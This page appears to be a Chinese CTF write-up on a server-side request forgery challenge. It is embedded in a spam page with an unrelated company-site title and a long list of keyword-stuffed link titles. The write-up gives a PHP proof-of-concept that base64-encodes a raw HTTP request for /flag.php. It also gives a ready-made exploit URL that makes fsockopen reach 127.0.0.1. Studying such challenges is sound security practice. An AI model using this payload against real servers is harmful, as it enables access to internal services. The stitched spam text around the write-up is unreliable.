当前位置: 首页 > news >正文

成都建工雅安建设有限责任公司网站网页图片下载

成都建工雅安建设有限责任公司网站,网页图片下载,怎样做网站卖自己的产品,有无专门做网站会员人数迅速增加的方法这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察 本题是需要我们去伪造一个ssrf的请求头去绕过 题目开始给了我们信息让我们去访问index.php fsockopen函数触发ssrf fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 bas…

这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察

本题是需要我们去伪造一个ssrf的请求头去绕过

题目开始给了我们信息让我们去访问index.php

fsockopen函数触发ssrf

fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 base64 编码的数据解码,并将数据写入到连接的 socket 中。

通过了解知道fsockopen函数就要清楚有考察ssrf的意思,需要往这个方向去想

之后就是利用poc构建脚本

<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>

得到data,host为127.0.0.1,port为80

之后就是构建url

GET /flag.php HTTP/1.1
Host: 127.0.0.1
Connection: Close

用base64加密然后构建url编码

/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

http://www.yayakq.cn/news/982015/

相关文章:

  • 网站建设设计报价军事最新消息
  • ui设计是学什么的南宁seo推广优化
  • 重庆网站设计工作室WordPress有哪些优秀主题
  • 家居设计网站模板罗湖网站设计
  • 有没有专业做网站的山东网站营销seo电话
  • 简单详细搭建网站教程视频教程四川网站建设博客
  • 做汤的网站有哪些飘仙建站论坛
  • 铜仁市城乡住房与建设局网站品牌网站查询
  • pc网站电商网站建设方案PPT
  • 高效网站推广费用没有做防注入的网站
  • 做网站用什么服务器会比较好dw网页制作基础知识
  • 移动网站建设规定免费在线自助建站
  • 哪里有手机网站建设海洋馆的网站怎么做
  • wordpress优化网站打开速度温州专业网站制作设计
  • 3建设营销型网站流程图学编程软件
  • 用dw制作一个网站建造师招聘网
  • 宜春网站开发公司电话平台网站
  • 淘宝客网站开发一个天津网站开发平台
  • 腾讯云wordpress建站网页平面设计招聘
  • 旅游电子商务网站开发方案网站怎么盈利的
  • 中国建设银行官网站e路通下载wordpress主题手机制作
  • 中国建设会计协会网站首页百度云搜索引擎网站
  • 落地页需要建网站吗自己怎做网站后台
  • 无锡手机网站制作深圳网页制作电话
  • 漳州做网站优化临沂哪里做网站
  • 中国城乡和住房建设部网站首页做网站较好的公司
  • 网站管理后台源码聊城制作网站
  • 什么网站可以做兼职 知乎wordpress zp
  • 琼海做网站口碑外包公司催收合法吗
  • 网站导航如何做半透明渐变三亚房产做公示是什么网站